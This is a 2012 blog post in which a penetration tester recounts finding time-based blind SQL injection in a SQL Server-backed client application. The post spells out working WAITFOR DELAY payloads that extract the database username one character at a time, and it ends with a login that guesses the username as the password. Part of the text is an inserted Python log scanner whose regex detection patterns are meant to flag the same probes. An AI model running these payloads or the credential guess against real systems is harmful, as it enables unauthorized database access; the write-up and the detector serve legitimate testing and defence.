Tuesday, October 23, 2012

MySQL Blind Time Based Technique

Oh hi everyone! Seems my blog is full of XSS collections nowadays and yeah..some of you might not be interested in this stuff since it's quite childish..but well..I'm too lazy to update my blog LOL.

But today, I felt guilty for my blog and here you go..another experience with my client for their client/server application.

Remember the Blind Oracle Injection in a client/server application from my previous previous preeeeviiiiooouussss post? haha. Well, this time, a few weeks ago, I was instructed by my boss to do a pentest on one of the client's applications.
The application uses a Java servlet environment as well, a client/server application. Well, this time I can't use my own computer; I need to use their development testing computer. Without any internet connection, it was quite tough for me to gather information from the internet.

Browsing a little through the application, checking how it works..hurmm..nothing interesting..just a simple client/server application but with quite complicated modules, like the previous one I tested..
hmmm..ouh?! suddenly..
there's a search box where I can try to search for a valid customer by entering their name...ahaa..this is quite interesting..it's similar to the previous thing I found.
I tried to check a valid user.
ahaa..ahaa..it appears..

then..with the power of the single quote!

woops!!! OMG! OMG! OMG!..haha..so there's probably SQL Injection on it! oh how lucky.

but there are some limitations on it. I tried to count columns, and that works, but a union based method won't be successful. hurmm..
what should I do? ah, go for lunch first :D

during my lunch, I tried to browse some good information on SQLi. oh yeah, since I already know the backend of the server is running on SQL Server, this narrows down my search.
here are some of my references
and of course the greatest cheatsheet, http://pentestmonkey.net/category/cheat-sheet

back from lunch!
Trying my luck!
bazinga; 1' IF (LEN(USER)=7) WAITFOR DELAY '0:0:10'--
it gives a FALSE reply.
* the server will not wait the 10 secs delay since the length of the current user is not 7 chars.

bazinga; 1' IF (LEN(USER)=8) WAITFOR DELAY '0:0:10'--
auw yeah..a TRUE reply
* the server will wait the 10 secs delay since the length of the current user is exactly 8 chars.

then proceeding to check the current user in case the client needs another POC.

bazinga; 1' IF (ASCII(lower(substring((USER),1,1)))>105) WAITFOR DELAY '0:0:10'--
it's J
bazinga; 1' IF (ASCII(lower(substring((USER),2,1)))>49) WAITFOR DELAY '0:0:5'--
it's 2
bazinga; 1' IF (ASCII(lower(substring((USER),3,1)))>101) WAITFOR DELAY '0:0:5'--
it's E
bazinga; 1' IF (ASCII(lower(substring((USER),4,1)))>101) WAITFOR DELAY '0:0:5'--
it's E
bazinga; 1' IF (ASCII(lower(substring((USER),5,1)))>106) WAITFOR DELAY '0:0:5'--
it's another J
and no need to proceed anymore since I can already guess the current user is j2eejdb
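From the defender's side, the probes above leave two distinct traces in an application or access log: the payload text itself (a quote breaking out of the search string followed by WAITFOR DELAY), and, for every TRUE branch, a response that takes a suspiciously round 5 or 10 seconds while ordinary searches answer in milliseconds. The Python scanner below is an added example, not code from the original post: it reads constructed log records (the " | "-separated format, the field order, the 3000 ms threshold and all sample lines are assumptions made for this example), percent-decodes the query string the way the servlet would, and flags a request when a parameter contains a delay primitive or when a quoted parameter coincides with a slow response. It also covers the MySQL and PostgreSQL delay functions, which the post does not mention, since the same detection applies to them.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import unquote_plus

# Constructed sample log (not from the original post). One record per request:
# timestamp | client IP | path | raw query string | response time in ms
# The fourth record carries the same LEN(USER)=8 payload as the post, but percent-encoded
# the way a browser or thick client would actually send it.
SAMPLE_LOG = """\
2012-10-23T12:01:05 | 10.0.0.5 | /app/customerSearch | name=bazinga | 42
2012-10-23T12:01:09 | 10.0.0.5 | /app/customerSearch | name=bazinga' | 38
2012-10-23T12:03:11 | 10.0.0.5 | /app/customerSearch | name=bazinga; 1' IF (LEN(USER)=7) WAITFOR DELAY '0:0:10'-- | 45
2012-10-23T12:03:30 | 10.0.0.5 | /app/customerSearch | name=bazinga%3B+1%27+IF+%28LEN%28USER%29%3D8%29+WAITFOR+DELAY+%270%3A0%3A10%27-- | 10031
2012-10-23T12:04:02 | 10.0.0.5 | /app/customerSearch | name=bazinga; 1' IF (ASCII(lower(substring((USER),1,1)))>105) WAITFOR DELAY '0:0:5'-- | 5019
2012-10-23T12:05:00 | 10.0.0.7 | /app/customerSearch | name=smith | 51
2012-10-23T12:05:12 | 10.0.0.9 | /app/report | id=7 | 9800
"""

# Time-delay primitives of the common engines. WAITFOR DELAY is the SQL Server one used in
# the post; SLEEP/BENCHMARK are MySQL, pg_sleep is PostgreSQL.
DELAY_PRIMITIVES = re.compile(
    r"WAITFOR\s+DELAY|\bSLEEP\s*\(|\bBENCHMARK\s*\(|\bPG_SLEEP\s*\(", re.IGNORECASE
)

# Assumed threshold: a customer search on this application normally answers well under a second.
SLOW_MS = 3000


@dataclass
class Finding:
    client: str
    path: str
    param: str
    value: str
    response_ms: int
    reasons: list = field(default_factory=list)


def parse_line(line):
    """Split one constructed log record into (timestamp, client, path, query, response_ms)."""
    ts, client, path, query, ms = (part.strip() for part in line.split(" | "))
    return ts, client, path, query, int(ms)


def split_params(query):
    """Yield (name, value) pairs, percent-decoded, so payloads are seen as the database saw them.
    Splits on '&' only and on the first '=' so that '=' inside a payload stays in the value."""
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        yield unquote_plus(name), unquote_plus(raw)


def inspect_request(client, path, query, response_ms):
    """Return a Finding if any parameter looks like a time-based probe, else None."""
    for param, value in split_params(query):
        reasons = []
        if DELAY_PRIMITIVES.search(value):
            # Catches every probe, including the FALSE branches that return quickly.
            reasons.append("delay primitive in parameter")
        if "'" in value and response_ms >= SLOW_MS:
            # The timing side of the same attack; also catches payloads that avoid the keyword list.
            reasons.append(f"quote in parameter and slow response ({response_ms} ms)")
        if reasons:
            return Finding(client, path, param, value, response_ms, reasons)
    return None


def scan_log(text):
    """Run inspect_request over every non-empty record and collect the findings in log order."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        _, client, path, query, ms = parse_line(line)
        finding = inspect_request(client, path, query, ms)
        if finding:
            findings.append(finding)
    return findings


def findings_per_client(findings):
    """Count findings per source address: a run of probes from one client is the real signal,
    a single slow page or a single stray quote is not."""
    counts = {}
    for f in findings:
        counts[f.client] = counts.get(f.client, 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f.client, f.path, f.param, f.response_ms, "; ".join(f.reasons))
    print(findings_per_client(scan_log(SAMPLE_LOG)))
```

On the sample, the three WAITFOR probes from 10.0.0.5 are flagged and nothing else is: the bare single-quote probe is fast and carries no primitive, and the slow /app/report request has no quote in its parameter, so a slow page on its own is not mistaken for an injection. Applying the per-client count before alerting keeps the noise down while still catching the pattern the post relies on, many requests from one source, each probing one bit.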

and then, trying my luck using the username as the password as well to connect to the SQL server.

gotcha! I'm in!
thanks for reading :)

p/s boss, if you're reading this..please..don't let me struggle with this client/server application anymore..pleaaseeeee.hahahaa..but I'll do it if there's a..*cough2..increment or..*cough2.bonus..*cough :P